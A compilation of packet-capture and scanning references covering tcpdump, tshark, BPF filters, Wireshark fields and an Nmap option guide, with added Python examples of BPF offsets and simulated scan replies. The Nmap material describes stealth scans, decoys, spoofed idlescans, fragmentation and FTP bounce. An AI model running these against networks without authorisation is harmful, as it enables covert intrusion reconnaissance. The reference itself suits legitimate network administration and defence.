destination IP addr, with optional cidr specification for IPv4 addresses.

sport
source port number.

dport
destination port number.

bytes
total transaction bytes.

sbytes
src -> dst transaction bytes.

dbytes
dst -> src transaction bytes.

pkts
total transaction packet count.

spkts
src -> dst packet count.

dpkts
dst -> src packet count.

rafilteraddr [-f address.file] [-v] [options] [-- filter-expression]

-v
Invert the logic and print flows that don't match any of the addresses.

EXAMPLES

List all flows to/from the class C network 217.195.49.0/24 in chronological order based on start time:

racluster -R * -w - -- net 217.195.49.0/24 | rasort -m stime -n

List all flows to/from 192.168.0.53, where the remote IP is not listed in ip_whitelist.txt. Sort flows based on bytes sent from the server:

rafilteraddr -R * -v -f /usr/local/etc/ip_whitelist.txt -w - -- host 192.168.0.53 | racluster -w - | rasort -m dbytes -n

== TCPDUMP ==

tcpdump [ -n ] [ -c count ] [ -i interface ] [ -r file ] [ -w file ] [ filter-expression ]

-c
Exit after receiving count packets.

-i
Sniff packets from interface.

-n
Don't convert addresses (i.e., host addresses, port numbers, etc.) to names.

-r
Read packets from file.

-w
Write the raw packets to file rather than parsing and printing them out.

EXAMPLES

Sniff and print DNS packets to stdout:

tcpdump -i eth0 -n port 53

Capture 100 packets from eth0 to sniffed.pcap:

tcpdump -i eth0 -c 100 -w sniffed.pcap

Filter a PCAP file to only include traffic to/from 217.195.49.146 into a new PCAP file:

tcpdump -r snort.log.1426118407 -w /var/tmp/217.195.49.146.pcap host 217.195.49.146

== TCPFLOW ==

tcpflow [-BcC] [-AH] [-b max_bytes] [-i iface] [-r file1.pcap] [expression]

-B
Force binary output even when printing to console with -C or -c.

-b
Capture no more than max_bytes bytes per flow.

-c
Console print (stdout), without storing any captured data to files.

-C
Console print without the packet source and destination details being printed.

-AH
Perform HTTP post-processing ("After" processing) to extract HTTP payloads.

-i
Capture packets from the network interface named iface.

-r
Read from PCAP file.

EXAMPLE

Extract contents of POP3 sessions (TCP 110):

tcpflow -r emails.pcap port 110

== TSHARK ==

tshark [ -c <packet count> ] [ -e <field> ] [ -n ] [ -q ] [ -r <infile> ] [ -R <read (display) filter> ] [ -T fields ] [ -w <outfile>|- ] [ -x ] [ -z <statistics> ]

-c <packet count>
Set the maximum number of packets to read.

-e <field>
Add a field to the list of fields to display if -T fields is selected.

-n
Disable network object name resolution (such as hostname, TCP and UDP port names).

-q
Don't print packet information; this is useful if you're using a -z option to calculate statistics and don't want the packet information printed, just the statistics.

-r <infile>
Read packet data from infile.

-R <read (display) filter>
Cause the specified filter to be applied.

-T fields
Set the format of the output when viewing decoded packet data; with fields, the values of the fields specified with the -e option are printed.

-w <outfile> | -
Write raw packet data to outfile or to the standard output if outfile is '-'.

-x
Cause TShark to print a hex and ASCII dump of the packet data after printing the summary or details.

-z <statistics>
Get TShark to collect various types of statistics and display the result after finishing reading the capture file. Use the -q flag if you're reading a capture file and only want the statistics printed.

EXAMPLES

Print client IP and HTTP URI for all HTTP requests containing the string "index.html":

tshark -r dump.pcap -R "http.request.uri contains index.html" -T fields -e ip.src -e http.request.uri


packetlife.net

by Jeremy Stretch v2.0

Command Line Options

-A Print frame payload in ASCII

-c <count> Exit after capturing count packets

-D List available interfaces

-e Print link-level headers

-F <file> Use file as the filter expression

-G <n> Rotate the dump file every n seconds

-i <iface> Specifies the capture interface

-K Don't verify TCP checksums

-L List data link types for the interface

-n Don't convert addresses to names

-p Don't capture in promiscuous mode

-q Quick output

-r <file> Read packets from file

-s <len> Capture up to len bytes per packet

-S Print absolute TCP sequence numbers

-t Don't print timestamps

-v[v[v]] Print more verbose output

-w <file> Write captured packets to file

-x Print frame payload in hex

-X Print frame payload in hex and ASCII

-y <type> Specify the data link type

-Z <user> Drop privileges from root to user

Capture Filter Primitives

[src|dst] host <host> Matches a host as the IP source, destination, or either

ether [src|dst] host <ehost> Matches a host as the Ethernet source, destination, or either

gateway host <host> Matches packets which used host as a gateway

[src|dst] net <network>/<len> Matches packets to or from an endpoint residing in network

[tcp|udp] [src|dst] port <port> Matches TCP or UDP packets sent to/from port

[tcp|udp] [src|dst] portrange <p1>-<p2> Matches TCP or UDP packets to/from a port in the given range

less <length> Matches packets less than or equal to length

greater <length> Matches packets greater than or equal to length

(ether|ip|ip6) proto <protocol> Matches an Ethernet, IPv4, or IPv6 protocol

(ether|ip) broadcast Matches Ethernet or IPv4 broadcasts

(ether|ip|ip6) multicast Matches Ethernet, IPv4, or IPv6 multicasts

type (mgt|ctl|data) [subtype <subtype>] Matches 802.11 frames based on type and optional subtype

vlan [<vlan>] Matches 802.1Q frames, optionally with a VLAN ID of vlan

mpls [<label>] Matches MPLS packets, optionally with a label of label

<expr> <relop> <expr> Matches packets by an arbitrary expression

Protocols

arp ether fddi icmp ip ip6 link ppp radio rarp slip tcp tr udp wlan

TCP Flags

tcp-urg tcp-ack tcp-psh tcp-rst tcp-syn tcp-fin

Modifiers

! or not

&& or and

|| or or

Examples

udp dst port not 53               UDP not bound for port 53

host 10.0.0.1 && host 10.0.0.2    Traffic between these hosts

tcp dst port 80 or 8080           Packets to either TCP port

ICMP Types

icmp-echoreply icmp-routeradvert icmp-tstampreply

icmp-unreach icmp-routersolicit icmp-ireq

icmp-sourcequench icmp-timxceed icmp-ireqreply

icmp-redirect icmp-paramprob icmp-maskreq

icmp-echo icmp-tstamp icmp-maskreply

TCPDUMP


Berkeley Packet Filters – The Basics

Created by Jeff Stebelton and edited by Chris Davis

Introduction

What are Berkeley Packet Filters? BPF's are a raw (protocol independent) socket interface to the data link layer that allows filtering of packets in a very granular fashion.

Working with BPF

If you use tcpdump for very long, you encounter what are called "primitives", filter expressions to tune your results to only see certain traffic. Examples of primitives are "net", "port", "addr" and qualifiers to those such as "src" or "dst".

With these we can limit our results using filters such as 'src host 10.10.1.1' or 'net 10.10'. There are many of these (see the man page of tcpdump for the full list).

You can also specify protocols, such as "ip", "tcp", or "icmp". Some even make comparisons, such as "less" and "greater" for packet length.

These primitives are short cuts for BPF's. Each one references some field or fields in one of the network protocol headers. For example, the embedded protocol field in the IP header is the 9th byte offset from 0. If the value contained there is a 6, the packet is TCP. So the primitive "tcp" really means show me all the packets in the IP header whose 9th byte offset from 0 contains a 6. If we wrote this as a BPF, it would look like this: 'ip[9] = 6' or using hex, 'ip[9] = 0x06'.

BPF's can go far beyond the built-in primitives, allowing us to get as granular as needed, down to the single bit level. If a field does not span the entire byte, we'll need to write a BPF to look at the bits in question to determine the value there.

Let's look at the first line of the IP header to see an example.

Byte 0                           | Byte 1          | Byte 2 - Byte 3
IP Version | IP Header Length    | Type of Service | Total Length

We see in byte 0 (we start counting from 0, which is what we mean by offset from 0) that there are two fields in the byte, the IP Version field and the IP Header Length field.

If we wanted to see what the IP version of the packet is, how would we do this? We only want the value in the high order nibble (high order = left most, as we count bits from right to left, and a nibble is 4 bits, or half a byte). To see that value we have to extract it from the byte of data somehow and look at it singularly. To do this, we employ a method known as bitmasking. Bitmasking is simply filtering out the bits we don't wish to look at and retaining the ones we do.

To accomplish this, we'll perform a bitwise AND operation on all of the bits in the byte. If we AND the bits, only the ones with a value of 1 will be retained. Let's look at this.

Here's a binary representation of a typical first byte in the IP header:

0100 0101

We've separated the two nibbles here for clarity. We see the low order nibble (right-most) has 0101. This is our IP header length. We want to check the high order nibble, which has the value 0100. To do this we will AND each of its bits with 1. In a bitwise AND, any combination except two 1's equals 0. Two 1's equal 1.

So to manipulate the bits to see the first nibble only, we want to AND 1's against the high order nibble and 0's against the lower order nibble. Since all 1's equal F in hex, we will write an expression ANDing hex F against the first nibble and 0 against the second.

Here's what the BPF will look like:

'ip[0] & 0xF0 = 0x40' (our search value). Alternate decimal version: 'ip[0] & 0xF0 = 64'

Broken down, we are telling tcpdump to look at the IP header (ip), first byte offset from 0 ( [0] ), retain all the bits in the first nibble and discard all the bits in the low order nibble ( & 0xF0 ), and show us all the packets with a value of 4 in that nibble ( = 0x40 ).

Here's our bitwise operation:

0100 0101   (first byte of the IP header)
1111 0000   (mask 0xF0)
---------
0100 0000   (result 0x40)

We now see the low order nibble has been filtered (all 0's) and we have the high order nibble left. Binary 0100 = decimal 4, so this shows us the packet has a value of 4 in the high order nibble of the first byte; the IP header is set to IPv4.

Sample Filters

Now that we see how BPF’s work, here are some samples of filters we can search on:

'ip[9] = 0x11'         udp

'ip[9] = 0x01'         icmp

'tcp[2:2]'             2nd byte, spanning two bytes (the destination port)

'icmp[0] = 0x08'       echo request packet

'tcp[2:2] < 0x14'      tcp dest port < 20

Let's create a filter for one of the more common and more complex uses: TCP flags.

The flags field in TCP is found at the 13th byte offset from 0. The flags themselves inhabit all of the lower order nibble, and the two lower order bits of the high order nibble. The two high order bits of the high order nibble are used for ECN (Explicit Congestion Notification). Here's our layout:

TCP Byte 13

Let's assume we wish to see all packets with the SYN and FIN flags set. This is anomalous behavior and usually indicative of a port scanning method.

                High order nibble         Low order nibble
Bit value:      128  64   32   16    --   8     4      2    1      <--- Binary for the entire byte
Flag:           CWR  ECE  Urg  Ack   --   Push  Reset  Syn  Fin
SYN+FIN only:   0    0    0    0     --   0     0      1    1      <--- each nibble converted directly to hex is 0x03

Using the above chart, you can get hex values for filters but can also use the

If we simply wanted to get all TCP packets with ONLY syn/fin set then we would use the following filter:

'tcp[13] = 0x03'

In this past example, we tell tcpdump to go to the 13th byte offset of the TCP header (the flags field) and search for packets that have an exact value of 0x03 in hex. However, what if we wanted all packets that had syn/fin regardless of whether they had additional flags?

'tcp[13] & 0x03 = 0x03'

This filter will grab ALL packets with any combination of flags so long as they have the syn/fin flags set.

Now that we know how to look at only the bits we need, we can apply this to any field, in any network header. You can, of course, string multiple filters together to get as specific as needed. Here's a tcpdump query to show us all packets with the Syn flag set, and a datagram (packet) size greater than 134 bytes (probable data on the Syn packet), and an IP version that is NOT 4:

tcpdump -nn -i eth0 'tcp[13] & 0x02 = 2 and ip[2:2] > 0x86 and ip[0] & 0xF0 != 0x40'


Wireshark Capture Filters

Examples

Capture only traffic to or from IP address 172.18.5.4:

host 172.18.5.4

Capture traffic to or from a range of IP addresses:

net 192.168.0.0/24

or

net 192.168.0.0 mask 255.255.255.0

Capture traffic from a range of IP addresses:

src net 192.168.0.0/24

or

src net 192.168.0.0 mask 255.255.255.0

Capture traffic to a range of IP addresses:

dst net 192.168.0.0/24

or

dst net 192.168.0.0 mask 255.255.255.0

Capture only DNS (port 53) traffic:

port 53

Capture non-HTTP and non-SMTP traffic on your server (both are equivalent):

host www.example.com and not (port 80 or port 25)

host www.example.com and not port 80 and not port 25

Capture except all ARP and DNS traffic:

port not 53 and not arp

Capture traffic within a range of ports

(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)

or, with newer versions of libpcap (0.9.1 and later):

tcp portrange 1501-1549

Capture only Ethernet type EAPOL:

ether proto 0x888e

Reject ethernet frames towards the Link Layer Discovery Protocol Multicast group:

not ether dst 01:80:c2:00:00:0e

Capture only IP traffic - the shortest filter, but sometimes very useful to get rid of lower layer protocols like ARP and STP:

ip

Capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and

multicast announcements:

not broadcast and not multicast

Capture IPv6 "all nodes" (router and neighbor advertisement) traffic. Can be used to find rogue RAs:

dst host ff02::1

Capture HTTP GET requests. This looks for the bytes 'G', 'E', 'T', and ' ' (hex values 47, 45, 54, and 20) just after the TCP header. "(tcp[12:1] & 0xf0) >> 2" figures out the TCP header length in bytes (the data offset in 32-bit words, times 4), so the check still lands on the first payload byte when TCP options are present. From Jefferson Ogata via the tcpdump-workers mailing list.

port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420
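Worked example (added to these notes; not code from the original page or from tcpdump/libpcap): the byte-offset filters above, the SYN/FIN mask, the SYN-with-data check and the HTTP GET test, re-implemented in Python over constructed IPv4/TCP packets so the offsets can be checked by hand. The packet builder, the function names and the sample packets are assumptions made for the example; checksums are left at zero because none of these filters read them.

```python
import socket
import struct

# TCP flag bits as they appear in byte 13 of the TCP header (tcp[13] in BPF syntax)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_ipv4_tcp(sport, dport, flags, payload=b"", options=b"",
                   src="10.0.0.1", dst="10.0.0.2"):
    """Constructed IPv4 + TCP packet (sample input, not a real capture).
    Checksums stay zero: byte-offset filters never look at them."""
    if len(options) % 4:
        raise ValueError("TCP options must be padded to a multiple of 4 bytes")
    doff = 5 + len(options) // 4                      # TCP header length in 32-bit words
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, doff << 4, flags,
                      65535, 0, 0) + options + payload
    total_len = 20 + len(tcp)                         # IHL is 5 (no IP options)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000,
                     64, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def ip_bytes(pkt, off, n=1):
    """ip[off:n]: n bytes, big-endian, counted from the start of the IP header."""
    return int.from_bytes(pkt[off:off + n], "big")


def tcp_bytes(pkt, off, n=1):
    """tcp[off:n]: the offset is relative to the TCP header, which begins after
    IHL * 4 bytes, so the IP header length is honoured automatically."""
    ihl = (pkt[0] & 0x0F) * 4
    return int.from_bytes(pkt[ihl + off:ihl + off + n], "big")


def syn_and_fin(pkt):
    """'tcp[13] & 0x03 = 0x03': both SYN and FIN set, whatever else is set."""
    return tcp_bytes(pkt, 13) & (SYN | FIN) == (SYN | FIN)


def syn_with_data(pkt, min_total_len=134):
    """'tcp[13] & 0x02 = 2 and ip[2:2] > 0x86': a SYN inside a datagram longer
    than 134 bytes, which normally means the SYN carries payload."""
    return bool(tcp_bytes(pkt, 13) & SYN) and ip_bytes(pkt, 2, 2) > min_total_len


def http_get(pkt):
    """'port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420'.
    (tcp[12] & 0xf0) >> 2 is the data offset (words) times 4, i.e. the header
    length in bytes, so the 4-byte read starts at the first payload byte."""
    if 80 not in (tcp_bytes(pkt, 0, 2), tcp_bytes(pkt, 2, 2)):
        return False
    hdr_len = (tcp_bytes(pkt, 12) & 0xF0) >> 2
    return tcp_bytes(pkt, hdr_len, 4) == 0x47455420   # b"GET "


def ip_version_nibble(pkt):
    """ip[0] & 0xF0: the version sits in the high nibble, so IPv4 yields 0x40,
    which is why comparing this value against plain 4 never matches."""
    return ip_bytes(pkt, 0) & 0xF0


if __name__ == "__main__":
    ts_opts = b"\x01\x01\x08\x0a" + b"\x00" * 8        # NOP, NOP, 10-byte timestamp option
    get = build_ipv4_tcp(40000, 80, PSH | ACK, b"GET / HTTP/1.1\r\n", ts_opts)
    print("SYN+FIN:", syn_and_fin(build_ipv4_tcp(40000, 22, SYN | FIN)))
    print("GET with options:", http_get(get), "naive offset 20:",
          tcp_bytes(get, 20, 4) == 0x47455420)
```

The GET packet is built with a 12-byte timestamp option on purpose: a filter that hard-codes offset 20 for the payload reads the option bytes instead and misses the request, while the header-length arithmetic in http_get() finds it.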


WIRESHARK DISPLAY FILTERS · PART 1
packetlife.net, by Jeremy Stretch, v2.0

Ethernet
eth.addr  eth.dst  eth.ig  eth.len  eth.lg  eth.multicast  eth.src  eth.trailer  eth.type

IEEE 802.1Q
vlan.cfi  vlan.etype  vlan.id  vlan.len  vlan.priority  vlan.trailer

IPv4
ip.addr  ip.checksum  ip.checksum_bad  ip.checksum_good  ip.dsfield  ip.dsfield.ce
ip.dsfield.dscp  ip.dsfield.ect  ip.dst  ip.dst_host  ip.flags  ip.flags.df  ip.flags.mf
ip.flags.rb  ip.frag_offset  ip.fragment  ip.fragment.error  ip.fragment.multipletails
ip.fragment.overlap  ip.fragment.overlap.conflict  ip.fragment.toolongfragment  ip.fragments
ip.hdr_len  ip.host  ip.id  ip.len  ip.proto  ip.reassembled_in  ip.src  ip.src_host
ip.tos  ip.tos.cost  ip.tos.delay  ip.tos.precedence  ip.tos.reliability  ip.tos.throughput
ip.ttl  ip.version

IPv6
ipv6.addr  ipv6.class  ipv6.dst  ipv6.dst_host  ipv6.dst_opt  ipv6.flow  ipv6.fragment
ipv6.fragment.error  ipv6.fragment.id  ipv6.fragment.more  ipv6.fragment.multipletails
ipv6.fragment.offset  ipv6.fragment.overlap  ipv6.fragment.overlap.conflict
ipv6.fragment.toolongfragment  ipv6.fragments  ipv6.hlim  ipv6.hop_opt  ipv6.host
ipv6.mipv6_home_address  ipv6.mipv6_length  ipv6.mipv6_type  ipv6.nxt  ipv6.opt.pad1
ipv6.opt.padn  ipv6.plen  ipv6.reassembled_in  ipv6.routing_hdr  ipv6.routing_hdr.addr
ipv6.routing_hdr.left  ipv6.routing_hdr.type  ipv6.src  ipv6.src_host  ipv6.version

ARP
arp.dst.hw_mac  arp.dst.proto_ipv4  arp.hw.size  arp.hw.type  arp.opcode  arp.proto.size
arp.proto.type  arp.src.hw_mac  arp.src.proto_ipv4

TCP
tcp.ack  tcp.checksum  tcp.checksum_bad  tcp.checksum_good  tcp.continuation_to  tcp.dstport
tcp.flags  tcp.flags.ack  tcp.flags.cwr  tcp.flags.ecn  tcp.flags.fin  tcp.flags.push
tcp.flags.reset  tcp.flags.syn  tcp.flags.urg  tcp.hdr_len  tcp.len  tcp.nxtseq  tcp.options
tcp.options.cc  tcp.options.ccecho  tcp.options.ccnew  tcp.options.echo  tcp.options.echo_reply
tcp.options.md5  tcp.options.mss  tcp.options.mss_val  tcp.options.qs  tcp.options.sack
tcp.options.sack_le  tcp.options.sack_perm  tcp.options.sack_re  tcp.options.time_stamp
tcp.options.wscale  tcp.options.wscale_val  tcp.pdu.last_frame  tcp.pdu.size  tcp.pdu.time
tcp.port  tcp.reassembled_in  tcp.segment  tcp.segment.error  tcp.segment.multipletails
tcp.segment.overlap  tcp.segment.overlap.conflict  tcp.segment.toolongfragment  tcp.segments
tcp.seq  tcp.srcport  tcp.time_delta  tcp.time_relative  tcp.urgent_pointer  tcp.window_size

UDP
udp.checksum  udp.checksum_bad  udp.checksum_good  udp.dstport  udp.length  udp.port  udp.srcport

Operators
eq  or  ==
ne  or  !=
gt  or  >
lt  or  <
ge  or  >=
le  or  <=

Logic
and  or  &&    Logical AND
or   or  ||    Logical OR
xor  or  ^^    Logical XOR
not  or  !     Logical NOT
[n] [...]      Substring operator


WIRESHARK DISPLAY FILTERS · PART 2
packetlife.net, by Jeremy Stretch, v2.0

Frame Relay
fr.becn  fr.chdlctype  fr.control  fr.control.f  fr.control.ftype  fr.control.n_r
fr.control.n_s  fr.control.p  fr.control.s_ftype  fr.control.u_modifier_cmd
fr.control.u_modifier_resp  fr.cr  fr.dc  fr.de  fr.dlci  fr.dlcore_control  fr.ea  fr.fecn
fr.lower_dlci  fr.nlpid  fr.second_dlci  fr.snap.oui  fr.snap.pid  fr.snaptype  fr.third_dlci
fr.upper_dlci

ICMPv6
icmpv6.all_comp  icmpv6.checksum  icmpv6.checksum_bad  icmpv6.code  icmpv6.comp
icmpv6.haad.ha_addrs  icmpv6.identifier  icmpv6.option  icmpv6.option.cga
icmpv6.option.length  icmpv6.option.name_type  icmpv6.option.name_type.fqdn
icmpv6.option.name_x501  icmpv6.option.rsa.key_hash  icmpv6.option.type
icmpv6.ra.cur_hop_limit  icmpv6.ra.reachable_time  icmpv6.ra.retrans_timer
icmpv6.ra.router_lifetime  icmpv6.recursive_dns_serv  icmpv6.type

BGP
bgp.aggregator_as  bgp.aggregator_origin  bgp.as_path  bgp.cluster_identifier  bgp.cluster_list
bgp.community_as  bgp.community_value  bgp.local_pref  bgp.mp_nlri_tnl_id
bgp.mp_reach_nlri_ipv4_prefix  bgp.mp_unreach_nlri_ipv4_prefix  bgp.multi_exit_disc
bgp.next_hop  bgp.nlri_prefix  bgp.origin  bgp.originator_id  bgp.type  bgp.withdrawn_prefix

HTTP
http.accept  http.accept_encoding  http.accept_language  http.authbasic  http.authorization
http.cache_control  http.connection  http.content_encoding  http.content_length
http.content_type  http.cookie  http.date  http.host  http.last_modified  http.location
http.notification  http.proxy_authenticate  http.proxy_authorization  http.proxy_connect_host
http.proxy_connect_port  http.referer  http.request  http.request.method  http.request.uri
http.request.version  http.response  http.response.code  http.server  http.set_cookie
http.transfer_encoding  http.user_agent  http.www_authenticate  http.x_forwarded_for

PPP
ppp.address  ppp.control  ppp.direction  ppp.protocol

RIP
rip.auth.passwd  rip.auth.type  rip.command  rip.family  rip.ip  rip.metric  rip.netmask
rip.next_hop  rip.route_tag  rip.routing_domain  rip.version

MPLS
mpls.bottom  mpls.cw.control  mpls.cw.res  mpls.exp  mpls.label  mpls.oam.bip16
mpls.oam.defect_location  mpls.oam.defect_type  mpls.oam.frequency  mpls.oam.function_type
mpls.oam.ttsi  mpls.ttl

ICMP
icmp.checksum  icmp.checksum_bad  icmp.code  icmp.ident  icmp.mtu  icmp.redir_gw  icmp.seq
icmp.type

DTP
dtp.neighbor  dtp.tlv_len  dtp.tlv_type  dtp.version

VTP
vtp.code  vtp.conf_rev_num  vtp.followers  vtp.md  vtp.md5_digest  vtp.md_len  vtp.neighbor
vtp.seq_num  vtp.start_value  vtp.upd_id  vtp.upd_ts  vtp.version  vtp.vlan_info.802_10_index
vtp.vlan_info.isl_vlan_id  vtp.vlan_info.len  vtp.vlan_info.mtu_size
vtp.vlan_info.status.vlan_susp  vtp.vlan_info.tlv_len  vtp.vlan_info.tlv_type
vtp.vlan_info.vlan_name  vtp.vlan_info.vlan_name_len  vtp.vlan_info.vlan_type


SCAN OPTION SUMMARY

Scan Name                Option  Requires Privileged Access  Identifies TCP Ports  Identifies UDP Ports
TCP SYN Scan             -sS     YES                         YES                   NO
TCP connect() Scan       -sT     NO                          YES                   NO
FIN Stealth Scan         -sF     YES                         YES                   NO
Xmas Tree Stealth Scan   -sX     YES                         YES                   NO
Null Stealth Scan        -sN     YES                         YES                   NO
Ping Scan                -sP     NO                          NO                    NO
Version Detection        -sV     NO                          NO                    NO
UDP Scan                 -sU     YES                         NO                    YES
IP Protocol Scan         -sO     YES                         NO                    NO
ACK Scan                 -sA     YES                         YES                   NO
Window Scan              -sW     YES                         YES                   NO
RPC Scan                 -sR     NO                          NO                    NO
List Scan                -sL     NO                          NO                    NO
Idlescan                 -sI     YES                         YES                   NO
FTP Bounce Attack        -b      NO                          YES                   NO
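Worked example (added to these notes; not Nmap's code and not from the original reference): what the TCP scan types in the table actually put on the wire, how a --scanflags string such as URGACKPSHRSTSYNFIN becomes a flag byte, and how each scan type turns a reply into open / closed / filtered / unfiltered. The responder models a strict RFC 793 stack (so the Maimon scan's BSD quirk is not reproduced); the function names, the reply tuples and the simulated ports are assumptions made for the example.

```python
# TCP flag bits; nmap's --scanflags accepts the names in any order, or a number
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_BITS = {"URG": URG, "ACK": ACK, "PSH": PSH, "RST": RST, "SYN": SYN, "FIN": FIN}

# Flag byte of the probe each TCP scan type sends
PROBE_FLAGS = {
    "-sS": SYN,                # SYN scan
    "-sT": SYN,                # connect() scan: same first packet, sent by the OS stack
    "-sF": FIN,                # FIN scan
    "-sN": 0,                  # NULL scan: no flags at all
    "-sX": FIN | PSH | URG,    # Xmas tree scan
    "-sM": FIN | ACK,          # Maimon scan
    "-sA": ACK,                # ACK scan (maps firewall rules, never reports open)
    "-sW": ACK,                # Window scan: ACK probe, inspects the RST's window
}


def scanflags(spec):
    """Turn a --scanflags value into the flag byte: 'URGACKPSHRSTSYNFIN',
    'FIN,PSH,URG', or a number such as 9 or 0x29."""
    spec = spec.strip()
    try:
        return int(spec, 0)
    except ValueError:
        pass
    value, rest = 0, spec.upper().replace(",", "").replace(" ", "")
    while rest:
        for name, bit in FLAG_BITS.items():
            if rest.startswith(name):
                value |= bit
                rest = rest[len(name):]
                break
        else:
            raise ValueError(f"unrecognised flag text in {spec!r}")
    return value


def rfc793_reply(port_open, probe):
    """How an unfiltered RFC 793 stack answers a probe on an open or closed
    port. Returns None (silence), ('SYN/ACK',) or ('RST', window)."""
    if probe & RST:
        return None                      # a RST is never answered
    if not port_open:
        return ("RST", 0)                # closed port: RST to anything
    if probe & ACK:
        return ("RST", 8192)             # no such connection; window value is stack-specific
    if probe & SYN:
        return ("SYN/ACK",)
    return None                          # FIN / NULL / Xmas on an open port: dropped


def port_state(scan, reply):
    """nmap's port state for the scan type given the reply: None, ('SYN/ACK',),
    ('RST', window), ('ICMP', code) for an ICMP type 3 unreachable, or ('UDP',)."""
    kind = reply[0] if reply else None
    if scan in ("-sS", "-sT"):
        return {"SYN/ACK": "open", "RST": "closed"}.get(kind, "filtered")
    if scan in ("-sF", "-sN", "-sX", "-sM"):
        return {"RST": "closed", "ICMP": "filtered"}.get(kind, "open|filtered")
    if scan == "-sA":
        return "unfiltered" if kind == "RST" else "filtered"
    if scan == "-sW":
        if kind == "RST":
            return "open" if reply[1] > 0 else "closed"
        return "filtered"
    if scan == "-sU":
        if kind == "UDP":
            return "open"
        if kind == "ICMP":
            return "closed" if reply[1] == 3 else "filtered"
        return "open|filtered"
    raise ValueError(f"unknown scan type {scan}")


def simulate(scan, port_open, firewalled=False):
    """Send the scan's probe at a simulated port; a firewalled port drops everything."""
    reply = None if firewalled else rfc793_reply(port_open, PROBE_FLAGS[scan])
    return port_state(scan, reply)


if __name__ == "__main__":
    for scan in PROBE_FLAGS:
        print(scan, "open:", simulate(scan, True), "closed:", simulate(scan, False),
              "firewalled:", simulate(scan, True, firewalled=True))
```

Running the loop shows the reason the FIN, NULL and Xmas scans are listed as "stealth" but report open|filtered: an open port and a firewall that drops the probe both answer with silence, and only the SYN scan can tell them apart.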

PING OPTIONS

ICMP Echo Request Ping -PE, -PI

TCP ACK Ping -PA[portlist], -PT[portlist]

TCP SYN Ping -PS[portlist]

UDP Ping -PU[portlist]

ICMP Timestamp Ping -PP

ICMP Address Mask Ping -PM

Don't Ping -P0, -PN, -PD (current Nmap releases spell this -Pn)

Require Reverse DNS Resolution -R

Disable Reverse DNS -n

Specify DNS Servers --dns-servers

HOST AND PORT OPTIONS

Exclude Targets --exclude <host1 [,host2],...>

Exclude Targets in File --excludefile <exclude_file>

Read Targets from File -iL <inputfilename>

Pick Random Numbers for Targets -iR <num_hosts>

Randomize Hosts --randomize_hosts, -rH

No Random Ports -r

Source Port --source-port <portnumber>

Specify Protocol or Port Numbers -p <port_range>

Fast Scan Mode -F

Create Decoys -D <decoy1 [,decoy2][,ME],...>

Source Address -S <IP_address>

Interface -e <interface>

List Interfaces --iflist

LOGGING OPTIONS

Normal Format -oN <logfilename>

XML Format -oX <logfilename>

Grepable Format -oG <logfilename>

All Formats -oA <basefilename>

Script Kiddie Format -oS <logfilename>

Resume Scan --resume <logfilename>

Append Output --append-output

REAL-TIME INFORMATION OPTIONS

Verbose Mode --verbose, -v

Version Trace --version-trace

Packet Trace --packet-trace

Debug Mode --debug, -d

Interactive Mode --interactive

Noninteractive Mode --noninteractive

TUNING AND TIMING OPTIONS

Time to Live --ttl

Use Fragmented IP Packets -f, -ff

Maximum Transmission Unit --mtu <databytes>

Data Length --data-length <databytes>

Host Timeout --host-timeout <milliseconds>

Initial Round Trip Timeout --initial-rtt-timeout <milliseconds>

Minimum Round Trip Timeout --min-rtt-timeout <milliseconds>

Maximum Round Trip Timeout --max-rtt-timeout <milliseconds>

Maximum Parallel Hosts per Scan --max-hostgroup <number>

Minimum Parallel Hosts per Scan --min-hostgroup <number>

Maximum Parallel Port Scans --max-parallelism <number>

Minimum Parallel Port Scans --min-parallelism <number>

Minimum Delay Between Probes --scan-delay <milliseconds>

Maximum Delay Between Probes --max-scan-delay

Timing Policies --timing, -T<0|1|2|3|4|5>

MISCELLANEOUS OPTIONS

Quick Reference Screen --help, -h

Nmap Version --version, -V

Data Directory --datadir <directory_name>

Quash Argument Vector -q

Define Custom Scan Flags --scanflags <flagval>

(Uriel) Maimon Scan -sM

IPv6 Support -6

Send Bad TCP or UDP Checksum --badsum

Professor Messer's Quick Reference Guide to NMAP. Copyright © 2007 Professor Messer, LLC, All Rights Reserved. http://www.ProfessorMesser.com SNC-201

OPERATING SYSTEM FINGERPRINTING

OS Fingerprinting -O

Limit System Scanning --osscan-limit

More Guessing Flexibility --osscan-guess, --fuzzy

Additional, Advanced, and Aggressive -A

VERSION DETECTION

Version Scan -sV

Don't Exclude Any Ports --allports

Set Version Intensity --version-intensity

Enable Version Scanning Light --version-light

Enable Version Scan All --version-all

RUN-TIME INTERACTIONS

Display Run-Time Help ?

Increase / Decrease Verbosity v / V

Increase / Decrease Debugging d / D

Increase / Decrease Packet Tracing p / P

Any Other Key Print Status


Identifying Open Ports with Nmap
(Figure page: the packet-exchange diagrams did not survive extraction; the panel titles and captions are kept below.)

Panels: TCP SYN scan (-sS), TCP connect() scan (-sT), TCP FIN scan (-sF), TCP Xmas tree scan (-sX), TCP NULL scan (-sN), TCP ping scan (-sP), version detection scan (-sV), UDP scan (-sU), TCP ACK scan (-sA), IP protocol scan (-sO), TCP window scan (-sW), idlescan (-sI <zombie host:[probeport]>), FTP bounce attack (-b <ftp_relay_host>).

Version detection scan (-sV): a version scan identifies open ports with a TCP SYN scan, and then queries each open port with a customized signature.

Idlescan (-sI):
Step 1: Nmap sends a SYN/ACK to the zombie workstation to induce a RST in return. This RST frame contains the initial IPID that nmap will remember for later.
Step 2: Nmap sends a SYN frame to the destination address, but nmap spoofs the IP address to make it seem as if the SYN frame was sent from the zombie workstation.
Step 3: Nmap repeats the original SYN/ACK probe of the zombie station. If the IPID has incremented by two rather than one (one RST answering the target's SYN/ACK, one answering nmap's own probe), then the port that was spoofed in the original SYN frame is open on the destination device. A closed or filtered port leaves the zombie's IPID only one higher, and those two cases cannot be told apart.

